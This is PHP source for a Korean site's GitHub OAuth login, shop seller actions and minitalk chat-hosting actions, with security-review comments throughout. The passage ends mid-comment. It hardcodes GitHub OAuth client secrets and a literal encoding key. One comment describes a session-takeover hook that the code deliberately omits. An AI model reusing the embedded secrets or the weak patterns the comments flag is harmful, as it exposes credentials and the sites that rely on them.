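        unset($_SESSION['SOCIAL_REDIRECT_URL']);
        header('location:' . $redirectUrl);
    }

    if ($action == 'github') {
        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER'];
        }

        if ($this->IM->domain == 'www.arzz.com') {
            $CLIENT_ID = 'b3f954eccc5378afbacf';
            $CLIENT_SECRET = '4507787bbac2f89382c5b29dc07017bbc776c218';
        } elseif ($this->IM->domain == 'www.minitalk.kr') {
            $CLIENT_ID = 'a5b5c360b237ed9de0c7';
            $CLIENT_SECRET = '0f5e658a0d05f83ee918da13cfe070ff5bc42e60';
        } else {
            $CLIENT_ID = 'b3f954eccc5378afbacf';
            $CLIENT_SECRET = '4507787bbac2f89382c5b29dc07017bbc776c218';
        }

        $AUTH_URL = 'https://github.com/login/oauth/authorize';
        $TOKEN_URL = 'https://github.com/login/oauth/access_token';

        $github = new OAuthClient();
        $github->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setAuthUrl($AUTH_URL)->setScope('user')->setAccessType('offline')->setUserAgent('Awesome-Octocat-App')->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            if ($github->authenticate($_GET['code']) == true) {
                $redirectUrl = $github->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($github->getAccessToken() == null) {
            $authUrl = $github->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $github->get('https://api.github.com/user');
        if ($data === false || empty($data->email) == true) {
            $this->IM->printError('API ERROR');
        }

        $accessToken = $github->getAccessToken();
        $refreshToken = $github->getRefreshToken() == null ? '' : $github->getRefreshToken();

        $this->socialLogin('github', $data->id, $data->name, $data->email, $data->avatar_url, $accessToken, $refreshToken);
    }

    // Listeners receive both the collected request values and the result.
    $this->IM->fireEvent('afterDoProcess', 'member', $action, $values, $results);

    return $results;
}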
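<?php
// Front controller: load the site configuration, build the iModule core object
// and render the layout for the current request.
require_once './configs/init.config.php';

$IM = new iModule();

// SECURITY: the logged-in member must never be derived from a request
// parameter. Writing Request('loggedIdx') into $_SESSION['MEMBER_LOGGED'] would
// let any visitor open a session as any member index without credentials, so
// no such hook exists here; the session is populated only by the member
// module's own login flows.
$IM->doLayout();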
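/**
 * Dispatches one shop-module action and returns its result object.
 *
 * Every value read through Request(), php://input or $_SERVER is supplied by the
 * client and is validated here before it reaches the database or the
 * attachment module.
 *
 * Handled actions: getCategory, sellerItem, sellerItemAddModal, sellerItemImage,
 * sellerItemPost, sellerPromotion, sellerPromotionAddModal, sellerPromotionPost.
 * Unknown actions fall through and return an empty result object.
 *
 * @param string $action Action name taken from the request.
 * @return stdClass Result object; `success` is set by every handled action.
 */
function doProcess($action)
{
    $results = new stdClass();
    $values = new stdClass();

    if ($action == 'getCategory') {
        $parent = Request('parent');
        $depth = Request('depth');

        // Start from an empty list so the response is well-formed when neither filter is given.
        $values->categorys = array();
        if ($parent) {
            $values->categorys = $this->db()->select($this->table->category)->where('parent', $parent)->orderBy('sort', 'asc')->get();
        } elseif ($depth) {
            $values->categorys = $this->db()->select($this->table->category)->where('depth', $depth)->orderBy('sort', 'asc')->get();
        }

        if ($parent == 0) {
            $results->parent = null;
        } else {
            $results->parent = $this->db()->select($this->table->category)->where('idx', $parent)->getOne();
        }

        $results->success = true;
        $results->categorys = $values->categorys;
    }

    if ($action == 'sellerItem') {
        // Only items owned by the logged-in member are listed.
        $lists = $this->db()->select($this->table->item)->where('midx', $this->IM->getModule('member')->getLogged());
        $total = $lists->copy()->count();
        $lists = $lists->get();
        for ($i = 0, $loop = count($lists); $i < $loop; $i++) {
            $lists[$i]->image = $this->IM->getModule('attachment')->getAttachmentUrl($lists[$i]->image_default);
        }

        $results->success = true;
        $results->total = $total;
        $results->lists = $lists;
    }

    if ($action == 'sellerItemAddModal') {
        $results->success = true;
        $results->modalHtml = $this->getSellerItemAddModal();
    }

    if ($action == 'sellerItemImage') {
        // The image metadata arrives in a request header and the image bytes in the raw body.
        $meta = isset($_SERVER['HTTP_IMAGE_META']) == true ? json_decode($_SERVER['HTTP_IMAGE_META']) : null;

        // imageType becomes part of a stored file name, so accept only a plain token.
        $isValidMeta = is_object($meta) == true
            && isset($meta->imageType) == true
            && is_string($meta->imageType) == true
            && preg_match('/^[A-Za-z0-9_-]+$/', $meta->imageType) == 1;

        if ($this->IM->getModule('member')->isLogged() == false) {
            // Writing request bodies to disk is a seller-only operation.
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        } elseif ($isValidMeta == false) {
            $results->success = false;
        } else {
            $fileBytes = file_get_contents("php://input");
            // NOTE(review): rand() is not unpredictable; this suffix only avoids name collisions.
            $tempFileName = $this->IM->getModule('attachment')->getTempPath(true) . '/' . md5($fileBytes) . '.' . rand(100000, 999999);
            file_put_contents($tempFileName, $fileBytes);

            // Re-encoding to a 600x600 JPEG doubles as the check that the upload really is an image.
            if ($this->IM->getModule('attachment')->createThumbnail($tempFileName, $tempFileName, 600, 600, false, 'jpg') == true) {
                $replaceIdx = empty($meta->imageIdx) == true ? false : Decoder($meta->imageIdx);

                if ($meta->imageType == 'addition' || $replaceIdx == false) {
                    $imageIdx = $this->IM->getModule('attachment')->fileSave($meta->imageType . '.jpg', $tempFileName, 'shop', $meta->imageType);
                } else {
                    // Replace the attachment named by the decoded token the client sent back.
                    $imageIdx = $this->IM->getModule('attachment')->fileReplace($replaceIdx, $meta->imageType . '.jpg', $tempFileName);
                }

                $results->success = true;
                $results->imageIdx = Encoder($imageIdx);
                $results->imageType = $meta->imageType;
                $results->imageUrl = $this->IM->getModule('attachment')->getAttachmentUrl($imageIdx, $meta->imageType == 'default' ? 'view' : 'thumbnail');
            } else {
                // Do not leave unprocessed upload bytes behind in the temp directory.
                if (file_exists($tempFileName) == true) {
                    unlink($tempFileName);
                }
                $results->success = false;
            }
        }
    }

    if ($action == 'sellerItemPost') {
        $errors = array();

        $values->idx = Request('idx');
        $values->title = Request('title') ? Request('title') : ($errors['title'] = $this->getLanguage('seller/item/post/help/title/error'));
        $values->detail = Request('detail');
        $values->seller = Request('seller') ? Request('seller') : ($errors['seller'] = $this->getLanguage('seller/item/post/help/seller/error'));
        $values->homepage = Request('homepage')
            ? (preg_match('/^http/', Request('homepage')) == true ? Request('homepage') : 'http://' . Request('homepage'))
            : '';
        $values->category1 = Request('category1') ? Request('category1') : ($errors['category1'] = $this->getLanguage('seller/item/post/help/category/error'));
        $values->category2 = Request('category2') ? Request('category2') : 0;
        $values->category3 = Request('category3') ? Request('category3') : 0;
        $values->brand = Request('brand');
        $values->maker = Request('maker');
        $values->model = Request('model');
        // Anchored at both ends so values such as "10abc" are rejected (same rule as the promotion `ea` field).
        $values->price = preg_match('/^[1-9]+[0-9]*$/', Request('price')) == true ? Request('price') : ($errors['price'] = $this->getLanguage('seller/item/post/help/price/error'));
        $values->allow_youth = Request('allow_youth');
        $values->image_default = Request('image_default') && Decoder(Request('image_default')) !== false ? Decoder(Request('image_default')) : ($errors['image_default'] = $this->getLanguage('seller/item/post/help/image/error'));

        // Missing content is a validation error and must block the save like every other field.
        $values->content = Request('content') ? Request('content') : ($errors['content'] = $this->getLanguage('seller/item/post/help/content/error'));

        // Attachment and image tokens are server-issued; drop any that fail to decode.
        $values->attachments = array();
        $postedAttachments = is_array(Request('attachments')) == true ? Request('attachments') : array();
        foreach ($postedAttachments as $encodedAttachment) {
            $decodedAttachment = Decoder($encodedAttachment);
            if ($decodedAttachment !== false) {
                $values->attachments[] = $decodedAttachment;
            }
        }
        $values->content = $this->encodeContent($values->content, $values->attachments);

        $values->image_addition = array();
        $postedImages = Request('image_addition') ? json_decode(Request('image_addition')) : array();
        if (is_array($postedImages) == true) {
            foreach ($postedImages as $encodedImage) {
                $decodedImage = Decoder($encodedImage);
                if ($decodedImage !== false) {
                    $values->image_addition[] = $decodedImage;
                }
            }
        }

        $values->option_enable = Request('option_enable') == 'TRUE' ? true : false;
        if ($values->option_enable == true) {
            $values->options = json_decode(Request('options'));

            // The options payload is client JSON: require the expected shape before counting or iterating.
            $hasOptionShape = is_object($values->options) == true
                && isset($values->options->names) == true && is_array($values->options->names) == true
                && isset($values->options->selects) == true && is_array($values->options->selects) == true;

            if ($hasOptionShape == false) {
                $errors['options'] = $this->getLanguage('seller/item/post/help/options/error');
                $values->options = new stdClass();
                $values->options->names = array();
                $values->options->selects = array();
            } elseif (count($values->options->names) == 0 || count($values->options->selects) == 0) {
                $errors['options'] = $this->getLanguage('seller/item/post/help/options/error');
            }

            for ($i = 0, $loop = count($values->options->selects); $i < $loop; $i++) {
                $select = $values->options->selects[$i];
                if (is_object($select) == false || isset($select->ea) == false || isset($select->price) == false || is_numeric($select->ea) == false || is_numeric($select->price) == false) {
                    $errors['options'] = $this->getLanguage('seller/item/post/help/options/numberOnly');
                    break;
                }
            }
        } else {
            $values->ea = strlen(Request('ea')) > 0 ? Request('ea') : -1;
            $values->options = new stdClass();
            $values->options->names = '';
            $values->options->selects = array();
        }

        if ($this->IM->getModule('member')->isLogged() == false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        } elseif (count($errors) == 0) {
            $insert = array();
            $insert['title'] = $values->title;
            $insert['detail'] = $values->detail;
            $insert['seller'] = $values->seller;
            $insert['homepage'] = $values->homepage;
            $insert['category1'] = $values->category1;
            $insert['category2'] = $values->category2;
            $insert['category3'] = $values->category3;
            $insert['brand'] = $values->brand;
            $insert['maker'] = $values->maker;
            $insert['model'] = $values->model;
            $insert['price'] = $values->price;
            $insert['allow_youth'] = $values->allow_youth;
            $insert['content'] = $values->content;
            $insert['search'] = GetString($values->content, 'index');
            $insert['image_default'] = $values->image_default;
            $insert['options'] = json_encode($values->options->names, JSON_UNESCAPED_UNICODE);

            if ($values->idx == null) {
                $insert['midx'] = $this->IM->getModule('member')->getLogged();
                $insert['reg_date'] = time();

                $values->idx = $this->db()->insert($this->table->item, $insert)->execute();
                $results->success = true;
            } else {
                // NOTE(review): editing an existing item is not implemented here. Report failure
                // explicitly; an update path must also verify that the item belongs to the
                // logged-in member before touching it or its options.
                $results->success = false;
            }

            if ($results->success == true) {
                for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) {
                    if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) {
                        $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'type' => 'ITEMDETAIL', 'parent' => $values->idx))->execute();
                    }
                }

                for ($i = 0, $loop = count($values->image_addition); $i < $loop; $i++) {
                    if ($this->db()->select($this->table->attachment)->where('idx', $values->image_addition[$i])->count() == 0) {
                        $this->db()->insert($this->table->attachment, array('idx' => $values->image_addition[$i], 'type' => 'ITEM', 'parent' => $values->idx))->execute();
                    }
                }

                // Rebuild the option rows for this item from the posted selections.
                $this->db()->delete($this->table->item_option)->where('idx', $values->idx)->execute();
                if ($values->option_enable == true) {
                    for ($i = 0, $loop = count($values->options->selects); $i < $loop; $i++) {
                        $option = array();
                        $option['idx'] = $values->idx;
                        $option['option1'] = $values->options->selects[$i]->option1;
                        $option['option2'] = $values->options->selects[$i]->option2 == null ? '' : $values->options->selects[$i]->option2;
                        $option['option3'] = $values->options->selects[$i]->option3 == null ? '' : $values->options->selects[$i]->option3;
                        $option['price'] = $values->options->selects[$i]->price;
                        $option['ea'] = $values->options->selects[$i]->ea;
                        $option['sort'] = $i;

                        $this->db()->insert($this->table->item_option, $option)->execute();
                    }
                }
            }
        } else {
            $results->success = false;
            $results->errors = $errors;
            $results->message = $this->getLanguage('error/required');
        }
    }

    if ($action == 'sellerPromotion') {
        // Builds a 7-day grid (3 days before to 3 days after the requested date) of promotion slots.
        $date = Request('date') ? strtotime(Request('date')) : strtotime(date('Y-m-d'));
        $timeInterval = $this->Module->getConfig('promotionTimeInterval') ? $this->Module->getConfig('promotionTimeInterval') : 30;
        $startDate = $date - 60 * 60 * 24 * 3;
        $endDate = $date + 60 * 60 * 24 * 4;

        // start_date => list of member indexes that already booked that slot.
        $registeredLists = array();
        $promotions = $this->db()->select($this->table->promotion)->where('start_date', $startDate, '>=')->where('start_date', $endDate, '<')->get();
        for ($i = 0, $loop = count($promotions); $i < $loop; $i++) {
            if (empty($registeredLists[$promotions[$i]->start_date]) == true) {
                $registeredLists[$promotions[$i]->start_date] = array();
            }
            $registeredLists[$promotions[$i]->start_date][] = $promotions[$i]->midx;
        }

        $midx = $this->IM->getModule('member')->getLogged();

        $lists = array();
        for ($i = 0; $i < 1440; $i = $i + $timeInterval) {
            $list = array();
            $list['start_time'] = $startDate + $i * 60;
            $list['start_date'] = date('Y-m-d', $startDate + $i * 60);

            for ($j = 1; $j <= 7; $j++) {
                $time = $startDate + $i * 60 + 86400 * ($j - 1);
                $list['day' . $j . '_time'] = $time;
                $list['day' . $j . '_date'] = date('Y-m-d', $time);

                if (isset($registeredLists[$time]) == true && count($registeredLists[$time]) > 0) {
                    // Cell format: "<FULL|EMPTY>@<number of bookings by the current member>".
                    $list['day' . $j] = count($registeredLists[$time]) >= $this->Module->getConfig('promotionTimeItemLimit') ? 'FULL' : 'EMPTY';
                    $registeredMidx = array_count_values($registeredLists[$time]);
                    $list['day' . $j] .= '@';
                    $list['day' . $j] .= isset($registeredMidx[$midx]) == true ? $registeredMidx[$midx] : 0;
                } else {
                    $list['day' . $j] = 'EMPTY@0';
                }
            }

            $lists[] = $list;
        }

        $results->success = true;
        $results->total = count($lists);
        $results->lists = $lists;
    }

    if ($action == 'sellerPromotionAddModal') {
        $item = $this->db()->select($this->table->item)->where('midx', $this->IM->getModule('member')->getLogged())->where('status', 'ACTIVE')->count();
        if ($item == 0) {
            $results->success = false;
            $results->message = $this->getLanguage('error/itemNotFound');
        } else {
            $date = Request('date');
            if ($date < time()) {
                $results->success = false;
                $results->message = $this->getLanguage('error/pastTime');
            } else {
                $results->success = true;
                $results->modalHtml = $this->getSellerPromotionAddModal($date);
            }
        }
    }

    if ($action == 'sellerPromotionPost') {
        $errors = array();

        $values->date = Request('date');
        $values->item = Request('item');
        // NOTE(review): min and max are stored exactly as received; confirm the expected range and validate.
        $values->min = Request('min');
        $values->max = Request('max');
        $values->ea = preg_match('/^[1-9]+[0-9]*$/', Request('ea')) == true ? Request('ea') : ($errors['ea'] = $this->getLanguage('seller/promotion/post/help/ea/error'));

        $timeInterval = $this->Module->getConfig('promotionTimeInterval') ? $this->Module->getConfig('promotionTimeInterval') : 30;
        $price = $this->Module->getConfig('promotionPrice');

        // The slot start is a unix timestamp: require digits only before doing arithmetic on it.
        if (is_scalar($values->date) == false || preg_match('/^[0-9]+$/', (string) $values->date) != 1) {
            $errors['date'] = $this->getLanguage('seller/promotion/post/help/date/error');
            $values->date = 0;
        } else {
            $values->date = intval($values->date);
        }

        if ($values->date < time() || $values->date % ($timeInterval * 60) != 0) {
            $errors['date'] = $this->getLanguage('seller/promotion/post/help/date/error');
        }

        $check = $this->db()->select($this->table->promotion)->where('start_date', $values->date)->count();
        if ($check >= $this->Module->getConfig('promotionTimeItemLimit')) {
            $errors['date'] = $this->getLanguage('seller/promotion/post/help/date/duplicated');
        }

        // The promoted item must be active and owned by the logged-in member.
        $check = $this->db()->select($this->table->item)->where('idx', $values->item)->where('midx', $this->IM->getModule('member')->getLogged())->where('status', 'ACTIVE')->get();
        if ($check == null) {
            $errors['item'] = $this->getLanguage('seller/promotion/post/help/item/error');
        }

        if ($this->IM->getModule('member')->isLogged() == false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notFound');
        } elseif ($this->IM->getModule('member')->getMember()->point < $price) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notEnoughPoint');
        } elseif (count($errors) == 0) {
            // NOTE(review): the slot-limit and point checks above are not atomic with this insert;
            // concurrent requests could exceed the limit or the balance.
            $insert = array();
            $insert['midx'] = $this->IM->getModule('member')->getLogged();
            $insert['item'] = $values->item;
            $insert['start_date'] = $values->date;
            $insert['end_date'] = $values->date + 60 * $timeInterval;
            $insert['min'] = $values->min;
            $insert['max'] = $values->max;
            $insert['ea'] = $values->ea;
            $insert['reg_date'] = time();

            $values->idx = $this->db()->insert($this->table->promotion, $insert)->execute();
            // Charge the promotion price to the member's point balance.
            $this->IM->getModule('member')->sendPoint(null, $price * -1, 'shop', 'promotion', array('idx' => $values->idx));

            $results->success = true;
        } else {
            $results->success = false;
            $results->errors = $errors;
            if (isset($errors['date']) == true) {
                $results->message = $errors['date'];
            } else {
                $results->message = $this->getLanguage('error/required');
            }
        }
    }

    $this->IM->fireEvent('afterDoProcess', 'shop', $action, $values, $results);

    return $results;
}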
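/**
 * Dispatches one minitalk hosting action and returns its result object.
 *
 * Two kinds of callers reach this method: logged-in members managing their
 * hosting plans (getSelectUser, getSelectTime, getPrice, getExpireDate,
 * getMyHosting, getService, hostingSubmit, getServerList, disconnect) and
 * remote minitalk clients/servers speaking the `service` protocol. All
 * Request() values, including the JSON in `data` and `d`, are client-controlled.
 *
 * NOTE(review): the `service` protocols have no caller authentication beyond the
 * client_id/server_id pair (and e-mail/password for register_server), and the
 * Encoder() key used for server/channel codes is a literal in this file; both
 * deserve a dedicated review.
 *
 * @param string $action Action name taken from the request.
 * @return stdClass Result object for the handled action.
 */
function doProcess($action)
{
    $results = new stdClass();
    $values = new stdClass();

    if ($action == 'getSelectUser') {
        $service = Request('service');

        if ($service == 'BETA') {
            $lists = array(array('usernum' => 2000, 'html' => '채널통합 <span class="fontBlue">2,000</span>명 (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 베타서비스기간중에만 제공', 'selected' => true));
        } elseif ($service == 'FREE') {
            $lists = array(array('usernum' => 100, 'html' => '채널통합 <span class="fontBlue">100</span>명 (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 15일마다 무료기간연장필요', 'selected' => true));
        } else {
            // Paid plans come from the price table; the label is built from numeric columns only.
            $lists = $this->db()->select($this->table->price)->orderBy('usernum', 'asc')->get();
            for ($i = 0, $loop = count($lists); $i < $loop; $i++) {
                $lists[$i]->html = '채널통합 <span class="fontBlue">' . number_format($lists[$i]->usernum) . '</span>명 (<i class="fa fa-rub"></i> <span class="fontRed">' . number_format($lists[$i]->price) . '</span>/1개월)' . ($lists[$i]->discount != 0 ? ' - ' . $lists[$i]->discount . '% 할인가' : '');
            }
        }

        $results->success = true;
        $results->lists = $lists;
    }

    if ($action == 'getSelectTime') {
        $service = Request('service');

        if ($service == 'BETA') {
            $lists = array(array('time' => 180, 'html' => '베타서비스기간중 <span class="fontBlue">무제한</span> (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 베타서비스기간중에만 제공', 'selected' => true));
        } elseif ($service == 'FREE') {
            $lists = array(array('time' => 15, 'html' => '신청일로부터 <span class="fontBlue">15</span>일 (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 15일마다 무료기간연장필요', 'selected' => true));
        } else {
            $lists = array(
                array('time' => 30, 'html' => '신청일로부터 <span class="fontBlue">30</span>일'),
                array('time' => 60, 'html' => '신청일로부터 <span class="fontBlue">60</span>일'),
                array('time' => 90, 'html' => '신청일로부터 <span class="fontBlue">90</span>일 - 5% 할인'),
                array('time' => 180, 'html' => '신청일로부터 <span class="fontBlue">180</span>일 - 10% 할인'),
            );
        }

        $results->success = true;
        $results->lists = $lists;
    }

    if ($action == 'getPrice') {
        $idx = Request('idx');
        $service = Request('service');

        $price = new stdClass();
        $price->refund = 0;

        // A refund is only computed for a hosting row owned by the logged-in member.
        if ($idx) {
            $data = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne();
            if ($data != null && $data->midx == $this->IM->getModule('member')->getLogged()) {
                $price->refund = $this->getRefundPrice($data);
            }
        }

        if ($service == 'BETA' || $service == 'FREE') {
            $price->monthly = 0;
            $price->time = $service == 'BETA' ? 180 : 15;
            $price->price = 0;
            $price->discount_time = 0;
            $price->discount_member = 0;
            $price->total = 0;

            $results->success = true;
            $results->price = $price;
        } elseif ($service == 'PAID') {
            $maxuser = Request('maxuser');
            $time = intval(Request('time'));
            $monthly = $this->db()->select($this->table->price)->where('usernum', $maxuser)->getOne();

            if ($monthly == null || in_array($time, array(30, 60, 90, 180), true) == false) {
                $results->success = false;
            } else {
                // Term discount: 5% for 90 days, 10% for 180 days.
                $timeDiscountRate = 0;
                if ($time == 90) {
                    $timeDiscountRate = 5;
                } elseif ($time == 180) {
                    $timeDiscountRate = 10;
                }
                $memberDiscountRate = $this->IM->getModule('member')->getMember() == null ? 0 : floor($this->IM->getModule('member')->getMember()->level->level / 2);

                $price->monthly = $monthly->price;
                $price->time = $time;
                $price->price = $price->monthly * ($time / 30) - $price->refund;
                if ($price->price > 0) {
                    $price->discount_time = floor($price->price * $timeDiscountRate / 100);
                    $price->discount_member = floor(($price->price - $price->discount_time) * $memberDiscountRate / 100);
                } else {
                    $price->discount_time = 0;
                    $price->discount_member = 0;
                }
                $price->total = $price->price - $price->discount_time - $price->discount_member;

                $results->success = true;
                $results->price = $price;
            }
        }
    }

    if ($action == 'getExpireDate') {
        // Cast first: the value is used in date arithmetic and must be an integer number of days.
        $time = intval(Request('time'));

        $results->success = true;
        $results->expire_date = $time ? date('Y년 m월 d일 H시 i분 s초', strtotime(date('Y-m-d 23:59:59', time() + 60 * 60 * 24 * $time))) . ' KST' : '신청기간을 선택하시면 예상만료일이 계산됩니다.';
    }

    if ($action == 'getMyHosting') {
        if ($this->IM->getModule('member')->isLogged() == false) {
            $results->success = false;
            $results->message = '먼저 로그인을 하여주십시오.';
        } else {
            $lists = $this->db()->select($this->table->hosting)->where('midx', $this->IM->getModule('member')->getLogged())->get();
            if (count($lists) == 0) {
                $results->success = false;
                $results->message = '회원님의 신청내역이 없습니다. 신규로 신청하여 주시기 바랍니다.';
            } else {
                $results->success = true;
                $results->lists = $lists;
            }
        }
    }

    if ($action == 'getService') {
        $idx = Request('idx');
        $data = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne();

        // Ownership check: members may only read their own hosting rows.
        if ($data == null || $data->midx != $this->IM->getModule('member')->getLogged()) {
            $results->success = false;
            $results->message = '해당 서비스신청내역을 찾을 수 없습니다.';
        } else {
            $results->success = true;
            $results->data = $data;
        }
    }

    if ($action == 'hostingSubmit') {
        if ($this->IM->getModule('member')->isLogged() == false) {
            $results->success = false;
            $results->message = '먼저 로그인을 하여주십시오.';
        } else {
            $isError = false;

            $idx = Request('idx');
            $title = Request('title') ? Request('title') : 'SERVICE #' . date('Ymd');
            $type = in_array(Request('type'), array('NEW', 'EXTEND'), true) == true ? Request('type') : ($isError = true);
            $service = in_array(Request('service'), array('BETA', 'FREE', 'PAID'), true) == true ? Request('service') : ($isError = true);

            // Numeric plan parameters must be plain digits before they are compared or stored.
            $maxuser = Request('maxuser');
            $maxuser = is_scalar($maxuser) == true && preg_match('/^[0-9]+$/', (string) $maxuser) == 1 ? intval($maxuser) : 0;
            $time = Request('time');
            $time = is_scalar($time) == true && preg_match('/^[0-9]+$/', (string) $time) == 1 ? intval($time) : 0;

            if ($service === 'BETA') {
                // Free plans have fixed limits (the ones getSelectUser/getSelectTime offer);
                // the client must not be able to pick a larger free plan.
                $maxuser = 2000;
                $time = 180;
            } elseif ($service === 'FREE') {
                $maxuser = 100;
                $time = 15;
            } elseif ($service === 'PAID') {
                if (in_array($maxuser, array(50, 100, 200, 300, 500, 1000, 2000), true) == false) {
                    $isError = true;
                }
                // Same paid terms that getPrice accepts.
                if (in_array($time, array(30, 60, 90, 180), true) == false) {
                    $isError = true;
                }
            }

            $price = 0;
            if ($isError == false && $service === 'PAID') {
                $monthly = $this->db()->select($this->table->price)->where('usernum', $maxuser)->getOne();
                if ($monthly == null) {
                    $isError = true;
                } else {
                    $price = $monthly->price * ($time / 30);
                }
            }

            $refund = 0;
            if ($idx) {
                $data = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne();
                if ($data != null && $data->midx == $this->IM->getModule('member')->getLogged()) {
                    // Pro-rated refund: daily price of the current plan times the whole days remaining.
                    $totalDays = floor(($data->expire_date - $data->reg_date) / 60 / 60 / 24);
                    if ($totalDays > 0) {
                        $refund = floor($data->price / $totalDays) * floor(($data->expire_date - time()) / 60 / 60 / 24);
                    }
                    $refund = $refund > 0 ? $refund : 0;
                } else {
                    $isError = true;
                }
            }

            if ($isError == false) {
                $paid = $this->getDiscountPrice($price - $refund, $time);
                $price = $this->getDiscountPrice($price, $time);

                $member = $this->IM->getModule('member')->getMember();
                if ($paid <= 0 || $member->point >= $paid) {
                    $expireDate = strtotime(date('Y-m-d 23:59:59', time() + 60 * 60 * 24 * $time));

                    if ($idx) {
                        // Scope the update to the member's own row; without the where() clause
                        // every hosting row would be rewritten.
                        $this->db()->update($this->table->hosting, array('service' => $service, 'maxuser' => $maxuser, 'price' => $price, 'reg_date' => time(), 'expire_date' => $expireDate))->where('idx', $idx)->execute();
                        $this->IM->getModule('member')->sendPoint($member->idx, $paid * -1, 'minitalk', 'change', array('idx' => $idx), true);
                    } else {
                        // NOTE(review): client_id is md5(member idx . time()), which is guessable;
                        // consider a CSPRNG-derived identifier since it is used to look up hosting rows.
                        $idx = $this->db()->insert($this->table->hosting, array('midx' => $member->idx, 'service' => $service, 'title' => $title, 'client_id' => strtoupper(md5($member->idx . time())), 'maxuser' => $maxuser, 'price' => $price, 'reg_date' => time(), 'expire_date' => $expireDate))->execute();
                        $this->IM->getModule('member')->sendPoint($member->idx, $paid * -1, 'minitalk', 'apply', array('idx' => $idx), true);
                    }
                    $results->success = true;
                } else {
                    $results->success = false;
                    $results->message = '포인트가 부족합니다.';
                }
            } else {
                $results->success = false;
                $results->message = '신청내역에 문제가 있습니다.';
            }
        }
    }

    if ($action == 'getServerList') {
        $results->success = true;
        $results->html = $this->getServerList();
    }

    // Second handler for the same action name: it runs after the one above and
    // overrides `success` while adding the rendered HTML.
    if ($action == 'getMyHosting') {
        $results->success = true;
        $results->html = $this->getMyHosting();
    }

    if ($action == 'disconnect') {
        $idx = Request('idx');
        $confirm = Request('confirm') == 'TRUE';
        $service = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne();

        if ($service == null || $service->midx != $this->IM->getModule('member')->getLogged()) {
            $results->success = false;
            $results->message = '권한이 없습니다. 먼저 로그인을 하여주시기 바랍니다.';
        } elseif ($confirm == true) {
            if ($service->server_id == '') {
                // Not linked to any client: refund the remainder and delete the service.
                $refund = $this->getRefundPrice($service);
                $this->IM->getModule('member')->sendPoint($service->midx, $refund, 'minitalk', 'refund', array(), true);
                $this->db()->delete($this->table->hosting)->where('idx', $idx)->execute();
                $results->success = true;
                $results->message = '성공적으로 서비스를 삭제하였습니다.';
            } else {
                // Linked: only clear the client binding.
                $this->db()->update($this->table->hosting, array('server_id' => ''))->where('idx', $idx)->execute();
                $results->success = true;
                $results->message = '성공적으로 클라이언트 연결을 해제하였습니다.';
            }
        } else {
            $results->success = true;
            $results->modalHtml = $this->getDisconnect($service);
        }
    }

    if ($action == 'service') {
        $protocol = Request('protocol');
        $version = Request('version');
        $data = json_decode(Request('data'));

        // "major.minor" of the client version; a missing minor part is treated as 0.
        $tempVersion = explode('.', (string) $version);
        $serverVersion = $tempVersion[0] . '.' . (isset($tempVersion[1]) == true ? $tempVersion[1] : '0');

        if (version_compare($version, '7.0.0', '>=') == true) {
            if ($protocol == 'checkServer' || $protocol == 'connectServer') {
                $client_id = $data->client_id;
                $server_id = strtoupper(md5($data->key . $data->domain));
                $isForce = isset($data->isForce) == true && $data->isForce == true;

                $hosting = $this->db()->select($this->table->hosting)->where('client_id', $client_id)->getOne();
                if ($hosting == null || $hosting->server_id != $server_id) {
                    $results->success = false;
                    $results->error = 202;
                } elseif ($hosting->expire_date < time()) {
                    $results->success = false;
                    $results->error = 203;
                } else {
                    $this->updateServer($serverVersion);

                    // (Re)assign the least-loaded online server when none is assigned or the current one is down.
                    if ($hosting->server == 0 || $this->checkOnline($hosting->server) == false) {
                        $server = $this->db()->select($this->table->server)->where('version', $serverVersion)->orderBy('user', 'asc')->where('status', 'ONLINE')->getOne();
                        if ($server != null) {
                            $hosting->server = $server->idx;
                            $this->db()->update($this->table->hosting, array('server' => $server->idx))->where('idx', $hosting->idx)->execute();
                        } else {
                            $hosting->server = 0;
                            $this->db()->update($this->table->hosting, array('server' => 0))->where('idx', $hosting->idx)->execute();
                        }
                    }

                    if ($hosting->server == 0) {
                        $results->success = false;
                        $results->error = 201;
                    } else {
                        $server = $this->db()->select($this->table->server)->where('idx', $hosting->server)->getOne();

                        $results->success = true;
                        if ($protocol == 'connectServer') {
                            $results->domain = $server->is_ssl == 'TRUE' ? 'https://' . $server->domain . ':' . $server->port : 'http://' . $server->domain . ':' . $server->port;
                            $results->secure = $server->is_ssl == 'TRUE';
                            // serverCode carries the plan limit from the database; channelCode carries
                            // the per-channel limit the client asked for.
                            $results->serverCode = Encoder(json_encode(array('group' => $hosting->idx, 'maxuser' => $hosting->maxuser, 'ip' => $data->ip, 'time' => time())), 'com.arzz.program.kr.minitalk.www');
                            $results->channelCode = Encoder(json_encode(array('maxuser' => $data->maxuser, 'ip' => $data->ip, 'time' => time())), 'com.arzz.program.kr.minitalk.www');
                            if ($data->opperCode && Decoder($data->opperCode, $data->key) !== false) {
                                $results->opperCode = Encoder(Decoder($data->opperCode, $data->key), 'com.arzz.program.kr.minitalk.www');
                            } else {
                                $results->opperCode = null;
                            }
                        } else {
                            $results->user = 0;
                            $results->channel = 0;
                            $results->status = 'ONLINE';
                        }
                    }
                }
            }
        } elseif (version_compare($version, '6.2.0', '>=') == true) {
            if ($protocol == 'callback') {
                // Relays a POST to the callback URL a customer registered. The URL is
                // customer-supplied, so only plain http(s) is allowed, redirects are not
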